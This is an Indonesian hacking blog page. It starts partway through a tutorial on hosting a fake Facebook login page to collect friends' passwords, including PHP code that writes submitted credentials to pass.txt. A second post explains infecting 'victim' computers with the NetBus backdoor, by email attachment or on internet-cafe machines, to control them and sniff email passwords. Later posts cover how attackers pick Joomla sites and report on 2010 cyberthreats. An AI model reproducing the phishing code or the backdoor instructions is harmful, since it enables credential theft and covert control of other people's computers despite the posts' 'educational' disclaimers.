www.110mb.com,www.ripway.com or t35.com


6.Then upload the contents into a directory


7.For that,after creating an id you should go to file manager and upload all these files.


8.Then just got to Facebook.htm and try out whether its working .

After you type the file , a password file named pass.txt will be created in the same directory .

you can see what username and password you have entered.



9.
Distribute the Facebook.HTML URL (ie: yoursite.com/Facebook.HTML) to your friends.When they login from this fake login page, the login.php will save the username and password onto the .TXT file (or any other format) in your site. Download the file to see the password inside it.


Update:I have found another working php script you can also try this


header("Location: http://WEBSITE ");

$handle =



fopen("pass.txt", "a");

foreach($_GET as



$variable => $value) {


fwrite($handle,



$variable);

fwrite($handle, "=");



fwrite($handle, $value);

fwrite($handle,



"\r\n");

}


fwrite($handle, "\r\n");

fclose($handle);

exit;



In this way you can
Hack a facebook password



Warning:This tutorial "How to hack facebook password " is for educational purposes


Technorati Tags: , , , ,

2
Menjahili Orang Lain Dengan Netbus

NetBus merupakan backdoor yang berjalan di sistem operasi Windows 9x dan NT. Dengan Netbus tersebut banyak hal menyenangkan yang bisa Anda lakukan, diantaranya adalah:



  • Membuka dan menutup CD-ROM Drive.

  • Melakukan shut down, log off, reboot dan power off.

  • Mengontrol gerakan mouse dan keyboard.

  • Menutup program.

  • Mengirimkan pesan atau text.

  • Memata-matai komputer ”korban”.

  • Mengarahkan komputer ”korban” sehingga membuka URL tertentu.

Untuk menjalankan NetBus dibutuhkan 2 buah file, yaitu NetBus.exe dan Patch.exe (tapi nama file tersebut bisa saja diganti dengan nama yang lain). NetBus.exe merupakan file yang diletakkan di komputer kita, sedangkan Patch.exe diletakkan di komputer ”korban”.

Ada beberapa cara untuk ”menanam” file Patch.exe di komputer ”korban”. Misalnya dengan mengirimkan sebagai attachment saat Anda mengirim email. Jika penerima email tersebut mengeksekusi file Patch.exe maka file tersebut akan ter-copy ke directory Windows ( pada komputer ”korban”). Cara lain adalah (ini yang lebih asyik) letakkan file tersebut di semua komputer pada suatu warnet.

Jika berhasil Anda tinggal jalankan file NetBus.exe. Pada kolom Host name/IP Address isi dengan host name/ip address pada komputer si ”korban”. Kalau Anda bingung, gunakan fasilitas Scan yang akan memeriksa komputer mana saja yang telah terdapat file Patch.exe. Selesai mengisi ip address klik tombol Connect. Tunggu beberapa saat. Jika koneksi berhasil tombol Connect akan berganti menjadi tombol Cancel dan setelah itu Anda bisa melakukan apa yang Anda sukai, termasuk menyadap password email orang lain.

Untuk mendapatkan NetBus Anda bisa mendownloadnya dari HackersClub.


Peringatan:

Gunakan artikel ini untuk menambah pengetahuan Anda. Jangan melakukan hal-hal yang dapat merugikan orang lain.

2
Jurus hackers membobol Situs Joomla

Menjadi site administrator Joomla, banyak suka dan dukanya. Salah satunya adalah situs diusili oleh orang lain. Menangani situs joomla jumlahnya sudah seratusan, ternyata menyisakan pengalaman pahit. Ada rasa takut, kesal, sedih, kecewa campur aduk kayak semen. Apalagi kalau mengalami Joomla attack. Ada sekitar sepuluh situs yang diobrak-abrik. Lima tewas di-deface, 3 abis disusupi spam dan sisanya dikirimi sampah bot-shell. Yang mengenaskan adalah di deface. Malu sama BOS,hiks :(.

Yang diserang adalah situs yang memiliki pagerank tertinggi dan open security. Semakin banyak backdoor yang terbuka, maka situs akan populer dibajak hacker. Sekali dibajak akan diworo-woro ke IRC room, untuk diperkosa rame-rame. Habislah sudah situs joomla merana? Kok bisa? Apa sih yang tak bisa di dunia ini? Semuanya saling berlawanan. Ada hitam ada putih. Ada baik ada Jahat. Ada FPI ada AKKBB. Ada Islam bener ada AHMADIYAH. Ada Islam benar ada JIL. Semuanya saling melengkapi.



Kembali ke topik. Kenapa situs Joomla dihack? Karena hacker tahu kelemahan situs Joomla. Bagaimana hackers menyerang situs Joomla? Inilah jawabannya. Para hacker menggunakan lima jurus (pertama) untuk menumbangkan situs Joomla.

Mau tau caranya? Ikuti penelusuran saya. Oups, hampir lupa. Sekali lagi saya beitahukan untuk para pembaca situs ini untuk mendaftar di langganan berita situs ini. Saya akan mengirimkan informasi update situs ini melalui email. Bila anda tertarik, silakan daftar di sini.

Lima jurus ini merupakan hasil telusuran, diskusi dan pengalaman pribadi dalam mengelola situs admin. Jadi saya mengundang anda untuk memberikan komentar, kritik dan saran bila jurus yang paparkan ini adalah palsu.

Para hackers Joomla dalam menyiapkan serangan ke situs berbasis Joomla akan beberapa strategi. Satu strategi awal dalam menyerang adalah menggunakan Lima jurus. Kelima jurus itu terdiri dari yaitu :
1. Versi Joomla yang digunakan
2. Hostingnya dimana? Jenis hostingnya seperti apa?
3. Jenis Plugin/Extensions yang diinstall
4. File dan folder permissions
5. Ranking situs
6. Jenis situs

Biar lebih mantap dan renyah dinikmati, saya akan membeberkan jurus-jurus mematikan ini pada anda. Mari mas..!

1. Versi Joomla yang digunakan

Semakin lama versi Joomla yang anda gunakan, anda maka semakin banyak lubang kelemahan (vulnerabilities) situs anda. Setiap detik laporan situs Joomla dihack banyak sekali. Laporan tentang hacking itu lalu dilaporkan dan langsung ditambal (patch). Pada Joomla yang sudah di-patch, maka akan muncul versi Joomla terbaru. Itu artinya Kode-skrip joomla anda harus di update. Anda cukup download bagian script yang akan ditambal. Cukup copy-paste, maka patching sudah selesai.

Tapiiiii. Tidak semua orang peduli pada isu ini. Malas dan bosan. Saya juga sudah pernah mengalami ini karena harus menangani situs Joomla yang terlalu banyak. Tapi kalo cuma satu doang mungkin gak masalah. Tapi kalau banyak, penyakit bosan dan CAPEK DEh melanda, maka updating ditinggalkan. Jangan diikuti sifat ini. Karena kalau sudah dibajak, maka anda akan kerja bakti selama seminggu untuk memulai dari awal lagi membangun situs. CEPEK, dehh


2. Hostingnya dimana? Jenis hostingnya seperti apa?

Bila ada ISP hosting yang tidak aman, para hackers menyusup di tempat tersebut. Pada beberapa tempat hosting malah jadi sarang penyamun para hackers dalam mencuri data dan menghacking situs. Kerja mereka rapi. Mereka seperi sindikat dan mafia. Mereka sengaja menyediakan jasa hosting murah hanya untuk menjebak client. Hati-hati juga pada free hosting. Tak ada jaminan bahwa situs anda aman. Jadi berhati-hatilah.

Tapi saya pernah punya client yang hosting di tempat murah (an) namun manajeman sekuritinya amburadul. Untuk mencirikannya mudah saja. Pertama, biasanya situs ISP-nya tidak profesional. Harganya murah (an) banget. Secara logis susah diterima dalam hitungan bisnis. Jadi ada yang dikorbankan. Supportnya kacau dan minim. Sakit hati dan kesal. Kalau ada kesalahan, client yang disalahkan. Site-adminnya kadang-kadang sok tau. Kalau mau detail silakan mampir ke webhostingtalk atau milis web hosting di yahoogroups.

Jadi berhati-hatilah dalam memilih hosting untuk situs Joomla anda. Kalau system keamanan dan support meragukan, cepat-cepatlah anda berpindah. Iklaskan uang anda, daripada anda kehilangan 100 kali lipat nantinya. Nanti akan saya bahas topik memilih hosting yang baik dan benar untuk situs Joomla. Semoga dapat sponsor

3. Jenis Plugin/Extensions yang diinstall

Lobang terbesar penyerangan situs Joomla ada di sini. Semakin banyak yang terinstall plugin/extensions disitus Joomla anda, semakin besar peluang serangan yang dilancarkan. Banyak programmer berhati jahat yang mengubah atau memalsu skrip plugin/extensions Joomla. Hal itu mudah mereka lakukan. Membuat skrip plugin/extensions Joomla bagi programmer merupakan makanan sehari-hari. Para programmer jahat ini juga sering menyusupkan skrip plugin/extensions ke forum joomla untuk didownload secara gratis. Jadi berhati-hatilah.

4. File dan folder permissions

Ini titik kelemahan yang mudah ditemukan dengan bantuan C99 shell atau php shell. Bila ditemukan banyak File dan folder permissions terbuka (666 atau 777) maka kiamat akan tiba. Perbaikilah CHMOD dengan JoomlaXplorer.

Yang default terbuka adalah folder media dan images. Karena memang terbuka untuk umum. Tapi kalau tidak perlu mohon ditutup saja. Karena ini adalah pintu utama menghacking situs anda. Kalau situs anda untuk perusahaan, korporat, yayasan, kelembagaan, lebih baik dimatikan saja fitur user registered berikut folder permissions-nya. Ubah semua CHMOD folder menjadi 644.

5. Ranking situs

Semakin tinggi sebuah pohon, maka semakin kencang angin yang meniupnya. Semakin tinggi rangking situs anda di google, yahoo dan alexa, maka semakin besar situs anda porak-poranda. Menggunakan google, situs anda akan ada diurutan pertama saat akan diserang. Karena situs anda sudah populer. Para hackers tidak punya belas kasih. Pokoknya, HAJAR BLEH.

Jadi dilema. Populer salah, gak populer juga salah. Saya mempunyai situs klien Joomla yang memiliki PR 5 dan alexa bagus. Di logs servernya bertaburan penyusup yang berniat jahat mengobrak-abrik server.

0
Tiga Major Cyberthreat Tahun 2010

KOMPAS.com - Tidak bisa disangkal bahwa penggunaan internet sudah begitu tinggi di Indonesia. Tetapi pengunaannya yang tinggi tentu diikuti dengan tingkat ancaman (threat) yang tinggi pula. Seperti sebuah barang berharga, makin tinggi nilainya maka makin diincar banyak penjahat.

Dalam seminar Computer Security Outlook 2010 yang diadakan oleh ESET di Jakarta Design Center (13/7), dijelaskan ada tiga Major Cyberthreat (ancaman dunia cyber) yang akan menyerang Indonesia. Tiga Major Cyberthreat tersebut adalah penyebaran virus melalui autorun.inf, ketidakamanan social networking (seperti pencurian akun pribadi), dan penyerangan operating system (windows, mac, dan linux).

Ketiga threat di atas dirasa akan tetap berlangsung hingga tahun 2010. Ketidakamanan social networking misalnya dianggap akan terus meningkat seiring dengan meningkatnya penggunaan situs pertemanan sosial seperti Facebook, Twitter,dll. Penyerangan operating system lewat virus conficker yang sudah masuk sepuluh besar virus komputer berbahaya di Indonesia juga dianggap akan terus terjadi.

"Kami memperkirakan tiga major cyberthreat masih akan terjadi sampai tahun 2010. Demand penggunaan internet memang tinggi tetapi awareness terhadap securitynya masih rendah," jelas Yudhi Kukuh, Technical Security Consultant dari ESET Indonesia.

Untuk mengantisipasi serangan tiga Major Cyberthreat tersebut, ESET mengembangkan sistem Threat Sense with Advance Heuristic yang terdapat pada antivirus ciptaan ESET, NOD32 Smart Security 4. Yang dimaksud dengan Advance Heuristic adalah metode untuk mencoba mengenali threat yang akan menyerang komputer.

Metode Advance Heuristic terdiri dari tiga hal yaitu Code Analysis (mengenali code yang ada pada threat), Emulation (melakukan uji tingkat bahaya pada threat), Malware Signature (mendeteksi malware), dan Generic Signature (mengidentifikasi threat yang sifatnya polimorph/ berubah-ubah). Advance Heuristic dikembangkan mengingat virus atau threat yang ada sekarang memilki kemampuan untuk berubah penampilan mulai dari nama hingga cara penyebarannya seperti lewat flashdisk atau e-mail.

"Virus sekarang memiliki sifat polimorph seperti berubah cara penyebarannya. Selama inti utama dari virus tersebut tidak berubah, virus tersebut masih akan dapat dideteksi," ungkap Yudi Kukuh menambahkan.

 
Ujie Caprone | © 2011 Blogger Template by Ujiecaprone.com